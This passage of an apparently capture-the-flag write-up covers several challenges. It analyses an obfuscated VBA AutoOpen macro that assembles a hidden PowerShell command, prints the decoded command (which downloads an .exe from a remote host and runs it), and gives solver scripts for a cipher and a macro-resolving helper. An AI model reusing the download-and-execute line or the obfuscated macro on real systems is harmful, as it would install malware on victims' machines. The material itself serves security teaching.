    If Sheets("Sheet2").Range("G1").Value = "zJ1AdN0x" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$oa"
    End If
    If Sheets("Sheet2").Range("Y93").Value = "E/5234dF" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "e$3fn"
    End If
    If Sheets("Sheet2").Range("A12").Value = "X42fc3/=" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "av3ei"
    End If
    If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "K ="
    End If
    If Sheets("Sheet2").Range("L99").Value = "t8PygQka" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " ne"
    End If
    If Sheets("Sheet2").Range("X31").Value = "gGJBD5tp" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "w-o"
    End If
    If Sheets("Sheet2").Range("C42").Value = "Dq7Pu9Tm" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bjec"
    End If
    If Sheets("Sheet2").Range("D22").Value = "X42/=rrE" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "aoX3&i"
    End If
    If Sheets("Sheet2").Range("T34").Value = "9u2uF9nM" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t Ne"
    End If
    If Sheets("Sheet2").Range("G5").Value = "cp+qRR+N" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t.We"
    End If
    If Sheets("Sheet2").Range("O17").Value = "Q8z4cV/f" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bCli"
    End If
    If Sheets("Sheet2").Range("Y50").Value = "OML7UOYq" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "ent;"
    End If
    If Sheets("Sheet2").Range("P41").Value = "bG9LxJvN" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$OrA"
    End If
    If Sheets("Sheet2").Range("L58").Value = "qK02fT5b" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "y{$oa"
    End If
    If Sheets("Sheet2").Range("P47").Value = "hXelsG2H" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "K.Dow"
    End If
    If Sheets("Sheet2").Range("A2").Value = "RcPl3722" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "Ry.is"
    End If
    If Sheets("Sheet2").Range("G64").Value = "Kvap5Ma0" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "nload"
    End If
    If Sheets("Sheet2").Range("H76").Value = "OjgR3YGk" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "File("
    End If
    f = t53df028c67b2f07f1069866e345c8b85 + qe32cd94f940ea527cf84654613d4fb5d + e5b138e644d624905ca8d47c3b8a2cf41 + tfd753b886f3bd1f6da1a84488dee93f9 + z92ea38976d53e8b557cd5bbc2cd3e0f8 + xc6fd40b407cb3aac0d068f54af14362e
    Retval = Shell(f, 0)
    Dim URL As String
    URL = "https://www.youtube.com/watch?v=mYiBdMnIT88"
    ActiveWorkbook.FollowHyperlink URL
End Sub
```

* There are some hidden sheets with a lot of random data in the cells. The macro appears to check specific cells and fill in different parts of a string. I checked each cell individually and concatenated the pieces, which gives the string `f` as follows:

```
poWeRsHELL -command "$oaK = new-object Net.WebClient; $OrA = 'http://fruit.gang/malware'; $CNTA = 'banANA-Hakrz09182afd4'; $jri=$env:public+'\'+$CNTA+'.exe'; try{$oaK.DownloadFile($OrA, $jri);Invoke-Item $jri;break;} catch {}"
```

* The challenge statement says that the name of the file being downloaded is the flag, in the format `utflag{...}`, so the flag here is `utflag{banANA-Hakrz09182afd4}`.

> utflag{banANA-Hakrz09182afd4}

### 3. PES-128

* We are given two files: a binary and flag.enc. As the challenge title says, this one is encrypted with PES. First, flag.enc contains a hex string.
* This is probably the flag after encryption. We see that the input must be hex and that the first byte is always the first byte of the input, `75`. Assuming it works like other similar ciphers where the first byte is unchanged, we can convert step by step to recover the original flag.

```
import subprocess

# Contents of flag.enc
encrypted_flag = "75ac713a945e9f78f657b735b7e1913cdece53b8853f3a7daade83b319c49139f8f655b0b77b"

def get_encrypted_output(input_hex):
    # Run the challenge binary on a hex input and return its last output line
    result = subprocess.run(['./PES'], input=input_hex, text=True, capture_output=True)
    output = result.stdout.strip().split('\n')[-1]
    return output

def brute_force_decrypt(encrypted_flag):
    partial_input = ''
    # Recover one input byte per iteration
    for i in range(0, len(encrypted_flag), 2):
        for j in range(256):
            trial_input = partial_input + f"{j:02x}"
            trial_output = get_encrypted_output(trial_input)
            # Keep the byte whose output is a prefix of the target (ignore empty output)
            if trial_output and encrypted_flag.startswith(trial_output):
                partial_input = trial_input
                print(f"Match found: {partial_input} -> {trial_output}")
                break
    return partial_input

decrypted_flag = brute_force_decrypt(encrypted_flag)
print(decrypted_flag)
```

* The result just needs to be converted from a hex string to characters.

> utflag{i_got_the_need_for_amdahls_law}
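
For The heist 1, the per-byte transform in the solver can also be inverted in closed form instead of brute-forced over an alphabet. This is an added example, not part of the original writeup or the challenge binary; the function names are my own and the transform is taken from the expression inside the solver's `decrypt_byte`.

```python
# Added example: closed-form inverse of the byte transform from The heist 1
# solver, enc = rol4(~(c + 96)) ^ 0x55. Function names are illustrative.

def rol8(value: int, shift: int) -> int:
    """Rotate an 8-bit value left by `shift` bits."""
    value &= 0xFF
    return ((value << shift) | (value >> (8 - shift))) & 0xFF


def encrypt_byte(c: int) -> int:
    """Forward transform, as used in the writeup's brute-force loop."""
    return rol8(~(c + 96) & 0xFF, 4) ^ 0x55


def decrypt_byte(e: int) -> int:
    """Undo each step in reverse order.

    XOR is its own inverse, rotating a byte by 4 bits is its own inverse,
    bitwise NOT is its own inverse, and the addition is undone modulo 256.
    """
    return ((~rol8(e ^ 0x55, 4) & 0xFF) - 96) & 0xFF


# Bytes from const_1 and const_2, as listed in the writeup's solver
TARGET = bytes([0xC3, 0x83, 0x23, 0x23, 0xB3, 0xC3,
                0x83, 0xE3, 0xA3, 0xE3, 0x33, 0x0C])


def recover_pin(target: bytes = TARGET) -> bytes:
    """Decrypt every target byte directly, with no candidate alphabet."""
    return bytes(decrypt_byte(b) for b in target)


def is_bijection() -> bool:
    """Every byte value round-trips, so each target byte has exactly one preimage."""
    return all(decrypt_byte(encrypt_byte(c)) == c for c in range(256))


if __name__ == "__main__":
    # The last target byte, 0x0C, decodes to a newline, which is outside the
    # brute-force alphabet and is why that solver returns '' for it.
    print(recover_pin())
    print(is_bijection())
```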
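
For Fruit Deals, the cell-by-cell check can be automated by evaluating the macro's `If ... Then` guards statically, without running the macro. This is an added example, not the author's method and not olevba functionality; `resolve_macro`, the sample macro and the cell values are constructed for illustration and only mimic the shape of the `AutoOpen` code, with the real cell values assumed to come from the workbook's Sheet2.

```python
import re

# A VBA string literal; an embedded double quote is written as "".
VBA_STR = r'"(?:[^"]|"")*"'
COND_RE = re.compile(
    r'^\s*If\s+Sheets\("([^"]+)"\)\.Range\("([A-Z]+[0-9]+)"\)\.Value\s*=\s*('
    + VBA_STR + r')\s+Then\s*$')
END_RE = re.compile(r'^\s*End If\s*$')
APPEND_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+)\s*\+\s*(' + VBA_STR + r')\s*$')
INIT_RE = re.compile(r'^\s*(\w+)\s*=\s*(' + VBA_STR + r')\s*$')
CONCAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*$')
SHELL_RE = re.compile(r'\bShell\(\s*(\w+)')


def unquote(literal):
    """Strip the outer quotes of a VBA literal and undo the "" escape."""
    return literal[1:-1].replace('""', '"')


def resolve_macro(macro, cells):
    """Return (string passed to Shell, addresses whose guard matched).

    `cells` maps (sheet, address) to the cell value. Nothing is executed:
    the macro text is only pattern-matched line by line.
    """
    values, matched = {}, []
    guard = None      # None outside an If block, otherwise the guard's result
    command = None
    for line in macro.splitlines():
        if m := COND_RE.match(line):
            sheet, cell, want = m.group(1), m.group(2), unquote(m.group(3))
            guard = cells.get((sheet, cell)) == want
            if guard:
                matched.append(cell)
        elif END_RE.match(line):
            guard = None
        elif guard is False:
            continue  # body of a guard that does not hold: decoy fragment
        elif m := APPEND_RE.match(line):
            values[m.group(1)] = values.get(m.group(2), "") + unquote(m.group(3))
        elif m := INIT_RE.match(line):
            values[m.group(1)] = unquote(m.group(2))
        elif m := CONCAT_RE.match(line):
            parts = re.split(r'\s*\+\s*', m.group(2))
            values[m.group(1)] = "".join(values.get(p, "") for p in parts)
        elif m := SHELL_RE.search(line):
            command = values.get(m.group(1))
    return command, matched


# Constructed sample in the same shape as the challenge macro (not its data).
SAMPLE_MACRO = '''Sub AutoOpen()
a = "p"
If Sheets("Sheet2").Range("L84").Value = "AAAA1111" Then
a = a + "ing"
End If
If Sheets("Sheet2").Range("G33").Value = "BBBB2222" Then
a = a + "XXXX"
End If
b = " -n 1 "
If Sheets("Sheet2").Range("V22").Value = "CCCC3333" Then
b = b + """host"
End If
If Sheets("Sheet2").Range("D22").Value = "DDDD4444" Then
b = b + "junk"
End If
If Sheets("Sheet2").Range("W6").Value = "EEEE5555" Then
b = b + ".example"""
End If
f = a + b
Retval = Shell(f, 0)
End Sub
'''

# Constructed cell values; G33 holds a different value and D22 is absent.
SAMPLE_CELLS = {
    ("Sheet2", "L84"): "AAAA1111",
    ("Sheet2", "G33"): "zzzzzzzz",
    ("Sheet2", "V22"): "CCCC3333",
    ("Sheet2", "W6"): "EEEE5555",
}

if __name__ == "__main__":
    print(resolve_macro(SAMPLE_MACRO, SAMPLE_CELLS))
```

The list of matched addresses shows which guards contributed to the command, so decoy fragments such as the macro's unused branches can be told apart from the ones that are actually assembled.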